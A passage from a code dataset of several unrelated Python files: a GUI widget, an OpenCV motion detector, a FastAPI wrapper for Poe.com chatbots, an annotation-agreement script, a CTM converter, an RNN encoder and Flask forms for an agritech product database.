bl,self.ti_max = self.addDialogRow(bl, \"Max value\", \n 175 if inWConf == None else str(inWConf['atr']['max']) )\n bl, self.ti_round = self.addDialogRow(bl, \"Round to\", \n \"1\" if inWConf == None else inWConf['atr']['round'] )\n bl, self.ti_unit = self.addDialogRow(bl, \"Unit\", \n \"%\" if inWConf == None else inWConf['atr']['unit'] )\n \n \n return bl\n \n def getWidget(self):\n '''print(\"getWidget () o \",self.mtitle,\n \"pos:\",int(self.pos[0]),\"x\",int(self.pos[1]),\n \"size:\",int(self.size[0]),\"x\",int(self.size[1]))\n '''\n return self.sm\n \n def updateIt(self, fromWho = '',vals = ''):\n self.update(fromWho, vals)\n self.setPos(self.pos)\n self.setScale(self.scale)\n self.setRot(self.rotation)\n \n def update(self, fromWho, vals):\n if ( self.gui.rl.current[:7] != 'Widgets' or\n self.ImOnScreen != self.gui.rl.current[7:]\n ):\n #print(\"skip\")\n return 0\n \n if 0:\n print('''\n \nupdate from widget_circularProgress[{}] \n from:{} \n gotvals:{}'''.format(\n self.mtitle, fromWho, vals\n ))\n \n v = self.wvfh.updateVal(fromWho, vals)\n if v != None:\n self.valueToDisplay = round( v, self.smSettings['round'] ) if self.smSettings['round'] > 0 else int( v ) \n self.sm.set_value(self.valueToDisplay,self.smSettings['title'],self.smSettings['unit'])\n \n \n \n def setGui(self, gui):\n self.gui = gui\n \n self.size = [\n 200,\n 200\n ]\n self.pos = [self.x,self.y]\n \n \n \n def getSize(self):\n return [self.size[0],self.size[1], 0.25, -1.0 ]\n \n ","repo_name":"yOyOeK1/ykpilot","sub_path":"Widget_circularProgress.py","file_name":"Widget_circularProgress.py","file_ext":"py","file_size_in_byte":7690,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"18901297668","text":"\"\"\"\r\nPython 3.9.10 (tags/v3.9.10:f2f3f53, Jan 17 2022, 15:14:21) [MSC v.1929 64 bit (AMD64)] on win32\r\nДанный модуль отвечает за детекцию движения\r\n\"\"\"\r\n\r\nimport cv2 # Импортируем модуль OpenCV\r\nimport time\r\nimport os\r\n\r\n\r\ndef corrector(name_file: str, chk_video_det, xy_coord: list, frame_zoom: int, size_detect: int,\r\n lab_o_proc, window, frame_shift, play_speed, but_start, but_pause):\r\n \"\"\"Данная функция восстанавливает файл с поврежденной временной шкалой и запускает детектор.\r\n name_file - Имя файла, который передается в обработку\r\n play_speed - Скорость воспроизведения (Пока не работает)\r\n chk_video_det - Флаг отображения окна воспроизведения при поиске\r\n xy_coord - Список координат зоны поиска\r\n frame_zoom - Коэффициент сжатия видео при отображении\r\n size_detect - Размер детектируемого объекта\r\n lab_o_proc - Ссылка на метку для отображения прогресса\r\n window - Ссылка на окно\r\n frame_shift - Сдвиг фреймов при обнаружении движения\r\n play_speed - Пропуск фреймов для ускорения\r\n but_start - Кнопка Старт\r\n but_pause - Кнопка Пауза\r\n\r\n \"\"\"\r\n if os.path.exists(\"ffmpeg.exe\"):\r\n os.system(f'ffmpeg -i \"{name_file}\" -map 0:v -vcodec copy -bsf:v h264_mp4toannexb -y \"{name_file[:-4]}_source-video.h264\"')\r\n os.system(f'ffmpeg -fflags +genpts -r 25 -i \"{name_file[:-4]}_source-video.h264\" -vcodec copy -y \"{name_file[:-4]}_recovered.avi\"')\r\n os.remove(f'{name_file[:-4]}_source-video.h264')\r\n return detector(f'{name_file[:-4]}_recovered.avi', chk_video_det, xy_coord, frame_zoom, size_detect,\r\n lab_o_proc, window, frame_shift, play_speed, but_start, but_pause)\r\n\r\n else:\r\n return 'Ffmpeg'\r\n\r\n\r\ndef detector(name_file: str, chk_video_det, xy_coord: list, frame_zoom: int, size_detect: int,\r\n lab_o_proc, window, frame_shift, play_speed, but_start, but_pause) -> str:\r\n \"\"\"Данная функция производит поиск движения в заданной области, в текущем файле.\r\n name_file - Имя файла, который передается в обработку\r\n chk_video_det - Флаг отображения окна воспроизведения при поиске\r\n xy_coord - Список координат зоны поиска\r\n frame_zoom - Коэффициент сжатия видео при отображении\r\n size_detect - Размер детектируемого объекта\r\n lab_o_proc - Ссылка на метку для отображения прогресса\r\n window - Ссылка на окно\r\n frame_shift - Сдвиг фреймов при обнаружении движения\r\n play_speed - Пропуск фреймов для ускорения\r\n but_start - Кнопка Старт\r\n but_pause - Кнопка Пауза\r\n\r\n \"\"\"\r\n if but_start['text'] == 'Старт':\r\n return \"OK\"\r\n\r\n none_frame: int = 0 # Счетчик для проверки пустых фреймов\r\n start_detect = time.time() # Получение времени начала обработки видео файла\r\n\r\n cap = cv2.VideoCapture(name_file) # Захватываем видео с файла\r\n # cap.set(cv2.CAP_PROP_FOURCC, cv2.VideoWriter_fourcc('H', '2', '6', '4'))\r\n off_frames = int(cap.get(cv2.CAP_PROP_FRAME_COUNT)) # Получаем общее количество фреймов\r\n\r\n frame_width_det = (cap.get(cv2.CAP_PROP_FRAME_WIDTH)) # Получаем размер исходного видео\r\n frame_height_det = (cap.get(cv2.CAP_PROP_FRAME_HEIGHT))\r\n\r\n output = cv2.VideoWriter(name_file[:-4] + \"_detect\" + name_file[len(name_file) - 4:],\r\n cv2.VideoWriter_fourcc('H', '2', '6', '4'), 20,\r\n (int(frame_width_det), int(frame_height_det))) # Параметры выгрузки MJPG PIM1 XVID\r\n if chk_video_det:\r\n cv2.namedWindow(name_file, 0) # Определяем окно вывода\r\n _, x_win, y_win = window.geometry().split('+')\r\n cv2.moveWindow(name_file, int(x_win)+350, int(y_win))\r\n while True: # Вывод кадров производится в цикле\r\n if but_pause['text'] == 'Продолжить':\r\n cap.release()\r\n output.release()\r\n cv2.destroyAllWindows()\r\n return 'Pause'\r\n if but_start['text'] == 'Старт':\r\n cap.release()\r\n output.release()\r\n cv2.destroyAllWindows()\r\n break\r\n ret1, frame1 = cap.read()\r\n # Данное смещение позволяет сгруппировать очертания двигающегося объекта\r\n for _ in range(frame_shift):\r\n cap.read()\r\n ret2, frame2 = cap.read()\r\n # Данное смещение служит для ускорения\r\n for _ in range(play_speed):\r\n cap.read()\r\n if cap.get(cv2.CAP_PROP_POS_FRAMES) == off_frames:\r\n break\r\n if not ret1 * ret2:\r\n none_frame += 1\r\n if none_frame > 10:\r\n print('Превышено допустимое количество пустых фреймов. Начато восстановление файла.')\r\n output.release() # Закрываем файл для вывода\r\n cv2.destroyAllWindows()\r\n os.remove(f'{name_file[:-4]}_detect{name_file[len(name_file) - 4:]}') # Удаляем его\r\n return 'Correct' # Возвращаем флаг, что надо запустить восстановление\r\n continue\r\n\r\n # frame1=frame1[y1_search:y2_search,x1_search:x2_search] #Обрезка фрейма до нужного размера. Может пригодиться\r\n # frame2=frame2[y1_search:y2_search,x1_search:x2_search]\r\n # Вывод в процентах прогресса\r\n lab_o_proc[\"text\"] = str(cap.get(cv2.CAP_PROP_POS_FRAMES) * 100 // off_frames + 1) + \" %\"\r\n window.update() # Обновление окна для отрисовки прогресса\r\n if ret2:\r\n if chk_video_det:\r\n # Метод для визуализации массива кадров\r\n frame1 = algorithm_detector_1(frame1, frame2, xy_coord, frame_zoom, size_detect, output)\r\n cv2.imshow(name_file, frame1)\r\n cv2.resizeWindow(name_file, int(frame_width_det) // 2,\r\n int(frame_height_det) // 2) # Устанавливаем размер окна вывода\r\n else:\r\n break\r\n if chk_video_det and cv2.getWindowProperty(name_file, 1) == 1: # Выход из программы по закрытию окна\r\n break\r\n if cv2.waitKey(2) == 27: # Выход по ESC\r\n break\r\n\r\n cap.release()\r\n output.release()\r\n # Проверяем количество сохраненных фреймов\r\n output = cv2.VideoCapture(name_file[:-4] + \"_detect\" + name_file[len(name_file) - 4:])\r\n frames_output = int(output.get(cv2.CAP_PROP_FRAME_COUNT))\r\n output.release()\r\n cv2.destroyAllWindows()\r\n if frames_output == 0: # Если сохраненных фреймов нет, то удаляем файл\r\n os.remove(f'{name_file[:-4]}_detect{name_file[len(name_file) - 4:]}') # Удаляем его\r\n end_detect = time.time() # Время завершения обработки видео файла\r\n # Выводит время затраченное на обработку файла\r\n print(name_file, '->', str(time.strftime(\"%M:%S\", time.localtime(end_detect - start_detect))))\r\n return 'OK'\r\n\r\n\r\ndef algorithm_detector_1(frame1, frame2, xy_coord: list, frame_zoom: int, size_detect: int, output):\r\n x1_search = xy_coord[0][0] * frame_zoom\r\n y1_search = xy_coord[0][1] * frame_zoom\r\n x2_search = xy_coord[1][0] * frame_zoom\r\n y2_search = xy_coord[1][1] * frame_zoom\r\n # Обработка видео фрейма для определения движения\r\n diff_frame = cv2.absdiff(frame1, frame2) # Вычитаем из одного кадра другой\r\n gray_frame = cv2.cvtColor(diff_frame, cv2.COLOR_BGR2GRAY) # перевод кадров в черно-белую градацию\r\n blur_frame = cv2.GaussianBlur(gray_frame, (5, 5), 0) # фильтрация лишних контуров\r\n _, thresh_frame = cv2.threshold(blur_frame, 20, 255,\r\n cv2.THRESH_BINARY) # метод для выделения кромки объекта белым цветом любое\r\n # значение больше 20 станет белым 255\r\n dilated_frame = cv2.dilate(thresh_frame, None, iterations=3) # расширение белой зоны\r\n '''\r\n данный метод противоположен методу erosion(), т.е. эрозии объекта, \r\n и расширяет выделенную на предыдущем этапе область\r\n '''\r\n\r\n contours, _ = cv2.findContours(dilated_frame, cv2.RETR_EXTERNAL,\r\n cv2.CHAIN_APPROX_SIMPLE) # cv2.RETR_TREE нахождение массива контурных точек\r\n cv2.rectangle(frame1, (x1_search, y1_search), (x2_search, y2_search), (255, 0, 0), 2) # Зона поиска\r\n for contour in contours:\r\n (x, y, w, h) = cv2.boundingRect(\r\n contour)\r\n '''\r\n преобразование массива из предыдущего этапа в кортеж из четырех координат\r\n метод contourArea() по заданным contour точкам, здесь кортежу, \r\n вычисляет площадь зафиксированного объекта в каждый момент времени, это можно проверить\r\n '''\r\n if (w * h) < ((x2_search - x1_search) * (y2_search - y1_search) * int(size_detect) // 100):\r\n continue\r\n if not (x + w > x1_search and x < x2_search and y + h > y1_search and y < y2_search):\r\n continue\r\n output.write(frame2) # Записываем не измененный фрейм\r\n cv2.rectangle(frame1, (x, y), (x + w, y + h), (0, 255, 0), 2) # Получение прямоугольника из точек кортеж��\r\n # Рисуем красную точку\r\n # cv2.circle(frame1, (int(frame_width_det) - 50, int(frame_height_det) - 40), 10, (0, 0, 255),-1)\r\n # Также можно было просто нарисовать контур объекта\r\n # cv2.drawContours(frame1, contours, -1, (0, 255, 0), 2)\r\n return frame1\r\n","repo_name":"QWERTYpy/MotionDetection","sub_path":"detector.py","file_name":"detector.py","file_ext":"py","file_size_in_byte":11445,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"43449955125","text":"from poe import load_chat_id_map, clear_context, send_message, get_latest_message, set_auth\nimport os\nfrom typing import Annotated\nfrom fastapi import FastAPI, WebSocket, WebSocketDisconnect, Header\nfrom fastapi.responses import HTMLResponse, JSONResponse\nfrom pydantic import BaseModel\n#--------------------------------------------------------------------------\napp = FastAPI(\n title=\"Free Poe.com API\",\n description=\"This is an API for Poe.com, a chatbot that uses GPT-3 to chat with you.\",\n version=\"0.0.1\",\n redoc_url=\"/docs\",\n docs_url=None\n)\nbots =['capybara','a2','chinchilla']\n\nclass Item(BaseModel):\n bot: str\n message: str\n cookie: str\n formkey: str\n\n@app.post(\n \"/chat/{bot}\",\n response_model=Item,\n summary=\"Chat\",\n description=\"This endpoint allows you to chat with the chosen bot on Poe.com. The bot will respond to your message. You can choose between the following bots: Sage (OpenAI): `capybara` , Claude-Instant (Anthropic): `a2` , ChatGPT (OpenAI): `chinchilla`\",\n responses={\n 200: {\n \"description\": \"Success\",\n \"content\": {\n \"application/json\": {\n \"example\": {\n \"message\": \"Hello!\",\n \"status\": \"success\",\n \"chat_id\": \"123456789\"\n }\n }\n }\n },\n 400: {\n \"description\": \"Bad Request\",\n \"content\": {\n \"application/json\": {\n \"example\": {\n \"message\": \"Bad Request\",\n \"details\": \"The bot you selected is not available. Please choose one of the following bots: capybara, a2, chinchilla\",\n \"status\": \"error\",\n }\n }\n }\n },\n \"422\": {\n \"description\": \"Unprocessable Entity\",\n },\n 500: {\n \"description\": \"Internal Server Error\",\n \"content\": {\n \"application/json\": {\n \"example\": {\n \"message\": \"Internal Server Error\",\n \"status\": \"error\",\n }\n }\n }\n }\n }\n )\n\nasync def chat(bot:str, options: Item):\n \"\"\"\n This is a Python function that allows users to select and chat with a bot from Poe.com.\n \"\"\"\n if bot not in bots:\n return JSONResponse(status_code=400, content={\"message\" : \"Bad Request\", \"details\":\"The bot you selected is not available. Please choose one of the following bots: capybara, a2, chinchilla\", \"status\":\"error\"})\n if options.cookie is None or options.formkey is None:\n return JSONResponse(status_code=400, content={\"message\" : \"Bad Request\", \"details\":\"At least one of the headers is not provided. Please ensure both the formkey and cookie headers are set.\", \"status\":\"error\"})\n try:\n set_auth('Quora-Formkey',options.formkey)\n set_auth('Cookie',options.cookie)\n chat_id = load_chat_id_map(options.bot)\n clear_context(chat_id)\n send_message(options.message,options.bot,chat_id)\n reply = get_latest_message(options.bot)\n return JSONResponse(status_code=200, content={\"message\" : reply, \"status\":\"success\", \"chat_id\":chat_id })\n except Exception as e:\n print(e)\n return JSONResponse(status_code=500, content={\"message\" : \"Internal Server Error\", \"status\":\"error\"})\n\n@app.get(\"/\")\nasync def main():\n\n \"\"\"\n This function sets up a basic endpoint for the Poe.com API that returns a simple HTML response with\n a link to the API documentation.\n :return: The `main` function is returning an HTML response with a title \"Poe.com API\" and a\n paragraph with a link to the API documentation. When the user navigates to the root URL (\"/\"), they\n will see this HTML content.\n \"\"\"\n content = \"\"\"\n \n

    Poe.com API

    \n

    Go to /docs to see the API documentation.

    \n \n \"\"\"\n return HTMLResponse(content=content)\n","repo_name":"aspekts/PoeAPI","sub_path":"api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":4251,"program_lang":"python","lang":"en","doc_type":"code","stars":53,"dataset":"github-code","pt":"72"} +{"seq_id":"27449762585","text":"# %%\nimport krippendorff\nimport numpy as np\nimport pandas as pd\nfrom sklearn.metrics import cohen_kappa_score\n\nagreement = pd.read_parquet(\"../../data/annotation_agreement_all_its.parquet.gzip\")\n# %%\nagreement[\"implicit_layer_enc\"] = agreement[\"implicit_layer\"].replace({\"Implicit HS\": 1, \"Explicit HS\": 0})\nagreement[\"subtlety_layer_enc\"] = agreement[\"subtlety_layer\"].replace({\"Subtle\": 1, \"Non-Subtle\": 0})\n# %%\nnof_its = agreement[\"iteration\"].nunique()\n\nits = []\nimp_cohen_kappas = []\nsubt_cohen_kappas = []\nkrips = []\n\nfor i in range(nof_its):\n coder_1 = agreement[(agreement[\"iteration\"] == i)\n & (agreement[\"coder\"] == 1)]\n coder_2 = agreement[(agreement[\"iteration\"] == i)\n & (agreement[\"coder\"] == 2)]\n\n y1_imp = coder_1[\"implicit_layer_enc\"]\n y2_imp = coder_2[\"implicit_layer_enc\"]\n\n y1_subt = coder_1[\"subtlety_layer_enc\"]\n y2_subt = coder_2[\"subtlety_layer_enc\"]\n\n its.append(i)\n imp_cohen_kappas.append(cohen_kappa_score(y1_imp, y2_imp))\n subt_cohen_kappas.append(cohen_kappa_score(y1_subt, y2_subt))\n\n reliability_data = np.vstack([y1_subt + 2 * y1_imp, y2_subt + 2 * y2_imp])\n\n krips.append(\n krippendorff.alpha(reliability_data=reliability_data,\n level_of_measurement=\"ordinal\"))\n\nagreement_scores = pd.DataFrame({\n \"it\": its,\n \"imp_cohen_kappa\": imp_cohen_kappas,\n \"subt_cohen_kappa\": subt_cohen_kappas,\n \"krip\": krips\n})\n# %%\nagreement_scores\n# %%\n","repo_name":"benjaminocampo/ISHate","sub_path":"experiments/data_statistics/annotation_agreement.py","file_name":"annotation_agreement.py","file_ext":"py","file_size_in_byte":1491,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"72"} +{"seq_id":"11164852201","text":"# Convert ctm to dictionary for quick access during transcript creation\nfrom collections import defaultdict\nimport json, sys, os\nimport logging\nlogging.basicConfig(format='[%(levelname)s] %(message)s', level=logging.INFO)\n\ndef ctm_to_dict(input_ctm, output_dict):\n \n f = open(input_ctm, 'r')\n lines = f.read().split(\"\\n\")\n f.close()\n ctm = defaultdict(list)\n count = 1\n for line in lines:\n if not line:\n continue\n linesplit = line.split(' ')\n videoname = linesplit[0]\n start = float(linesplit[2])\n duration = float(linesplit[3])\n linesplit = line.split()\n wordstart = float(linesplit[2])\n wordduration = float(linesplit[3])\n word = linesplit[4]\n count += 1\n ctm[videoname].append((start, duration, word))\n logging.info(count)\n logging.info(\"Done\")\n with open(output_dict, 'w') as outfile:\n json.dump(dict(ctm), outfile, indent=4)\n \nif __name__ == '__main__':\n ctm_to_dict(input_ctm=sys.argv[1])","repo_name":"AlanSavio25/AVSR-Dataset-Pipeline","sub_path":"utils/ctm_to_dict.py","file_name":"ctm_to_dict.py","file_ext":"py","file_size_in_byte":1025,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"72"} +{"seq_id":"32882117966","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\nfrom .base_model import BaseModel\n\n\nclass RnnEncoderModel(BaseModel):\n def __init__(\n self,\n device_id,\n vocab_size,\n pad_token_id,\n unk_token_id,\n go_token_id,\n eos_token_id,\n embedding_size,\n dropout,\n num_layers,\n hidden_size,\n ):\n super(RnnEncoderModel, self).__init__(\n device_id=device_id,\n vocab_size=vocab_size,\n pad_token_id=pad_token_id,\n unk_token_id=unk_token_id,\n go_token_id=go_token_id,\n eos_token_id=eos_token_id,\n embedding_size=embedding_size,\n )\n self.dropout = dropout\n self.num_layers = num_layers\n self.hidden_size = hidden_size\n\n self.initial_encoder_state = torch.zeros(\n self.num_layers,\n 1,\n self.hidden_size,\n requires_grad=False,\n )\n self.encoder = nn.LSTM(\n input_size=self.embedding_size,\n hidden_size=self.hidden_size,\n num_layers=self.num_layers,\n dropout=self.dropout if self.num_layers > 1 else 0,\n bias=True,\n )\n\n if self.device_id is not None:\n self.cuda(self.device_id)\n self.initial_encoder_state = self.to_device(\n self.initial_encoder_state\n )\n\n def get_parameters(self):\n parameters = super(RnnEncoderModel, self).get_parameters()\n parameters.update({\n 'dropout': self.dropout,\n 'num_layers': self.num_layers,\n 'hidden_size': self.hidden_size,\n })\n return parameters\n\n def encode(self, input_source):\n emb_input_source = F.dropout(\n self.embeddings(input_source),\n p=self.dropout,\n training=self.training,\n )\n batch_size = input_source.size(1)\n if self.initial_encoder_state.size(1) != batch_size:\n self.initial_encoder_state.resize_(\n self.initial_encoder_state.size(0),\n batch_size,\n self.initial_encoder_state.size(2),\n ).fill_(0)\n\n _, final_encoder_state = self.encoder(\n emb_input_source,\n (self.initial_encoder_state, self.initial_encoder_state),\n )\n return final_encoder_state\n","repo_name":"urikz/ChatBot","sub_path":"ShaLab/models/rnn_encoder_model.py","file_name":"rnn_encoder_model.py","file_ext":"py","file_size_in_byte":2408,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"72"} +{"seq_id":"7499514776","text":"from flask_wtf import FlaskForm\nfrom flask_wtf.file import FileField, FileAllowed, FileRequired\nfrom wtforms import StringField, TextField, TextAreaField, SubmitField, SelectField, widgets, SelectMultipleField, PasswordField, BooleanField\nfrom wtforms.ext.sqlalchemy.fields import QuerySelectField, QuerySelectMultipleField\nfrom wtforms.validators import ValidationError, DataRequired, Email, EqualTo, Length, Optional\nfrom wtforms.widgets.core import html_params\nfrom markupsafe import Markup\nfrom .models import HWProducts, SWProducts, Crops, Companies, MagickalInterventions, User, History, Locations, HWCategories, SWCategories\nimport pycountry\n\nclass CountrySelectField(SelectField):\n def __init__(self, *args, **kwargs):\n super(CountrySelectField, self).__init__(*args, **kwargs)\n self.choices = [(country.name, country.name) for country in pycountry.countries]\n\nclass MultiCheckboxField(SelectMultipleField):\n widget = widgets.ListWidget(prefix_label=False)\n option_widget = widgets.CheckboxInput() \n\nclass CustomSelect:\n \"\"\"\n Renders a select field allowing custom attributes for options.\n Expects the field to be an iterable object of Option fields.\n The render function accepts a dictionary of option ids (\"{field_id}-{option_index}\")\n which contain a dictionary of attributes to be passed to the option.\n\n Example:\n form.customselect(option_attr={\"customselect-0\": {\"disabled\": \"\"} })\n \"\"\"\n\n def __init__(self, multiple=False):\n self.multiple = multiple\n\n def __call__(self, field, option_attr=None, **kwargs):\n if option_attr is None:\n option_attr = {}\n kwargs.setdefault(\"id\", field.id)\n if self.multiple:\n kwargs[\"multiple\"] = True\n if \"required\" not in kwargs and \"required\" in getattr(field, \"flags\", []):\n kwargs[\"required\"] = True\n html = [\"\")\n return Markup(\"\".join(html))\n\nclass HWProductForm(FlaskForm):\n # sw_choices = []\n # for softwares in SWProducts.query.all():\n # sw_choices.append((softwares.sw_company_name, softwares.sw_company_name))\n\n \"\"\"Company Product Form.\"\"\"\n hw_company_name = StringField(\n 'Company Name',\n [DataRequired()]\n )\n hw_company_product = StringField(\n 'Company Product',\n [DataRequired()]\n )\n hw_hardware_components = StringField(\n 'Hardware Components (please separate by comma)',\n [DataRequired()]\n )\n # hw_categories = SelectField(\n # 'Category', \n # choices=[\n # ('robot seeders and planters','robot seeders and planters'), \n # ('precision technology','precision technology'),\n # ('cybernetic greenhouses','cybernetic greenhouses'),\n # ('irrigation','irrigation'),\n # ('pesticide and fertilizer robots','pesticide and fertilizer robots'),\n # ('sensors','sensors'),\n # ('herd management', 'herd management'),\n # ('robot harvesters','robot harvesters'),\n # ('other','other')\n # ],\n # validators=[DataRequired()] \n # )\n\n hw_categories = QuerySelectMultipleField(\n 'Categories', \n query_factory=lambda: HWCategories.query.order_by(HWCategories.id).all(),\n get_label='hw_categories_name',\n option_widget=widgets.CheckboxInput(), \n widget=widgets.ListWidget(prefix_label=False), \n allow_blank=True\n )\n\n hw_product_description = TextAreaField(\n 'Product Description',\n [DataRequired()]\n )\n hw_product_img = FileField(\n 'Product Image',\n [DataRequired()]\n # validators=[FileRequired(), FileAllowed(images, 'Images only!')]\n )\n hw_references = StringField(\n 'References (links - please separate by comma)',\n [DataRequired()]\n )\n\n sw_id = QuerySelectMultipleField(\n 'Software used', \n query_factory=lambda: SWProducts.query.order_by(SWProducts.id).all(),\n get_label='sw_company_product',\n option_widget=widgets.CheckboxInput(), \n widget=widgets.ListWidget(prefix_label=False), \n allow_blank=True\n )\n\n companies_list = QuerySelectMultipleField(\n 'Associated Companies', \n query_factory=lambda: Companies.query.order_by(Companies.id).all(),\n get_label='company_name',\n option_widget=widgets.CheckboxInput(), \n widget=widgets.ListWidget(prefix_label=False), \n allow_blank=True\n )\n \n hw_locations_desc = CountrySelectField(\n 'Locations (please separate by comma)',\n [DataRequired()]\n )\n hw_locations_img = FileField(\n 'Location image',\n [DataRequired()]\n # validators=[FileRequired(), FileAllowed(images, 'Images only!')]\n )\n crops_id = QuerySelectMultipleField(\n 'Related Crops', \n query_factory=lambda: Crops.query.order_by(Crops.id).all(),\n get_label='crop_name',\n option_widget=widgets.CheckboxInput(), \n widget=widgets.ListWidget(prefix_label=False), \n allow_blank=True\n )\n # spells_id = StringField(\n # 'Spells (select one)'\n # )\n\n # recaptcha = RecaptchaField()\n submit = SubmitField('Submit')\n\n # field = FieldType(\n # 'LABEL',\n # validators=[ExampleValidator(message=\"ERROR MESSAGE\")],\n # )\n\n# class MultiCheckboxField(SelectMultipleField):\n# widget = widgets.ListWidget(prefix_label=False)\n# option_widget = widgets.CheckboxInput()\n\nclass SWProductForm(FlaskForm):\n string_of_files = [\n 'genomics', 'mapping', 'identification', 'analytics', 'statistics', 'NDVI', 'imagery', 'testing', 'marketing', 'supplychain', 'irrigation', 'other'\n ]\n \n files = [(x, x) for x in string_of_files]\n\n \"\"\"Software Product Form.\"\"\"\n sw_company_name = StringField(\n 'Company Name',\n [DataRequired()]\n )\n sw_company_product = StringField(\n 'Company Product',\n [DataRequired()]\n )\n sw_software_components = StringField(\n 'Software Elements (please separate by comma)',\n [DataRequired()]\n )\n sw_categories = MultiCheckboxField(\n 'Category', \n choices=files\n )\n sw_product_description = TextAreaField(\n 'Product Description',\n [DataRequired()]\n )\n sw_product_img = FileField(\n 'Product Image',\n [DataRequired()]\n # validators=[FileRequired(), FileAllowed(images, 'Images only!')]\n )\n sw_os_license = StringField(\n 'Add Open Source License if applicable',\n [DataRequired()]\n # validators=[FileRequired(), FileAllowed(images, 'Images only!')]\n )\n sw_references = StringField(\n 'References (links - please separate by comma)',\n [DataRequired()]\n )\n\n sw_locations_desc = CountrySelectField(\n 'Locations (please separate by comma)',\n [DataRequired()]\n )\n sw_locations_img = FileField(\n 'Location image',\n [DataRequired()]\n # validators=[FileRequired(), FileAllowed(images, 'Images only!')]\n )\n crops_id = QuerySelectMultipleField(\n 'Related Crops', \n query_factory=lambda: Crops.query.order_by(Crops.id).all(),\n get_label='crop_name',\n option_widget=widgets.CheckboxInput(), \n widget=widgets.ListWidget(prefix_label=False), \n allow_blank=True\n )\n hw_id = QuerySelectMultipleField(\n 'Related Hardware', \n query_factory=lambda: HWProducts.query.order_by(HWProducts.id).all(),\n get_label='hw_company_product',\n option_widget=widgets.CheckboxInput(), \n widget=widgets.ListWidget(prefix_label=False), \n allow_blank=True\n )\n\n companies_list = QuerySelectMultipleField(\n 'Associated Companies', \n query_factory=lambda: Companies.query.order_by(Companies.id).all(),\n get_label='company_name',\n option_widget=widgets.CheckboxInput(), \n widget=widgets.ListWidget(prefix_label=False), \n allow_blank=True\n )\n\n sw_categories = QuerySelectMultipleField(\n 'Categories', \n query_factory=lambda: SWCategories.query.order_by(SWCategories.id).all(),\n get_label='sw_categories_name',\n option_widget=widgets.CheckboxInput(), \n widget=widgets.ListWidget(prefix_label=False), \n allow_blank=True\n )\n\n\n # recaptcha = RecaptchaField()\n submit = SubmitField('Submit')\n\n\n\nclass CropForm(FlaskForm):\n\n \"\"\"crops form entry\"\"\"\n crop_name = StringField(\n 'Crop Name',\n [DataRequired()]\n )\n genus_species = StringField(\n 'Genus species',\n [DataRequired()]\n )\n crop_intellectual_property = StringField(\n 'Intellectual property data',\n [DataRequired()]\n )\n crop_chemicals_used = StringField(\n 'Chemicals used',\n [DataRequired()]\n )\n # sw_id = QuerySelectField(\n # 'Software used', \n # query_factory=lambda: SWProducts.query.all(),\n # get_label='sw_company_product',\n # allow_blank=True\n # )\n sw_id = QuerySelectMultipleField(\n 'Related Software', \n query_factory=lambda: SWProducts.query.order_by(SWProducts.id).all(),\n get_label='sw_company_product',\n option_widget=widgets.CheckboxInput(), \n widget=widgets.ListWidget(prefix_label=False), \n allow_blank=True\n )\n hw_id = QuerySelectMultipleField(\n 'Related Hardware', \n query_factory=lambda: HWProducts.query.order_by(HWProducts.id).all(),\n get_label='hw_company_product',\n option_widget=widgets.CheckboxInput(), \n widget=widgets.ListWidget(prefix_label=False), \n allow_blank=True\n )\n companies_list = QuerySelectMultipleField(\n 'Associated Companies', \n query_factory=lambda: Companies.query.order_by(Companies.id).all(),\n get_label='company_name',\n option_widget=widgets.CheckboxInput(), \n widget=widgets.ListWidget(prefix_label=False), \n allow_blank=True\n )\n crop_genetic_information = TextAreaField(\n 'Genetic Information',\n [DataRequired()]\n )\n crop_companions = StringField(\n 'Companions',\n [DataRequired()]\n # validators=[FileRequired(), FileAllowed(images, 'Images only!')]\n )\n crop_description = StringField(\n 'Description',\n [DataRequired()]\n # validators=[FileRequired(), FileAllowed(images, 'Images only!')]\n )\n crop_img = FileField(\n 'Crop image',\n [DataRequired()]\n # validators=[FileRequired(), FileAllowed(images, 'Images only!')]\n )\n crop_references = StringField(\n 'References (links - please separate by comma)',\n [DataRequired()]\n )\n crop_locations = CountrySelectField(\n 'Locations grown',\n )\n\n # recaptcha = RecaptchaField()\n submit = SubmitField('Submit')\n\n\nclass CompanyForm(FlaskForm):\n\n \"\"\"company form entry\"\"\"\n company_name = StringField(\n 'Company Name',\n [DataRequired()]\n )\n company_keywords = StringField(\n 'Keywords',\n )\n company_board_members = StringField(\n 'Board members',\n [DataRequired()]\n )\n company_description = TextAreaField(\n 'Company description',\n [DataRequired()]\n )\n company_img = FileField(\n 'Company image',\n # validators=[FileRequired(), FileAllowed(images, 'Images only!')]\n )\n sw_id = QuerySelectMultipleField(\n 'Related Software', \n query_factory=lambda: SWProducts.query.order_by(SWProducts.id).all(),\n get_label='sw_company_product',\n option_widget=widgets.CheckboxInput(), \n widget=widgets.ListWidget(prefix_label=False), \n allow_blank=True\n )\n hw_id = QuerySelectMultipleField(\n 'Related Hardware', \n query_factory=lambda: HWProducts.query.order_by(HWProducts.id).all(),\n get_label='hw_company_product',\n option_widget=widgets.CheckboxInput(), \n widget=widgets.ListWidget(prefix_label=False), \n allow_blank=True\n )\n crops_id = QuerySelectMultipleField(\n 'Related Crops', \n query_factory=lambda: Crops.query.order_by(Crops.id).all(),\n get_label='crop_name',\n option_widget=widgets.CheckboxInput(), \n widget=widgets.ListWidget(prefix_label=False), \n allow_blank=True\n )\n\n related_companies = StringField(\n 'Related Companies',\n [DataRequired()]\n # validators=[FileRequired(), FileAllowed(images, 'Images only!')]\n )\n company_profits = StringField(\n 'Company Profits',\n [DataRequired()]\n # validators=[FileRequired(), FileAllowed(images, 'Images only!')]\n )\n\n # recaptcha = RecaptchaField()\n submit = SubmitField('Submit')\n\n\nclass MagickalInterventionForm(FlaskForm):\n string_of_files = [\n 'hex', 'curse', 'spell', 'ritual', 'brew', 'seed', 'invocation', 'incantation', 'necromancy', 'ancestor work', 'other'\n ]\n files = [(x, x) for x in string_of_files]\n \"\"\"crops form entry\"\"\"\n hw_id = QuerySelectField(\n 'Related Hardware', \n query_factory=lambda: HWProducts.query.all(),\n get_label='hw_company_product',\n 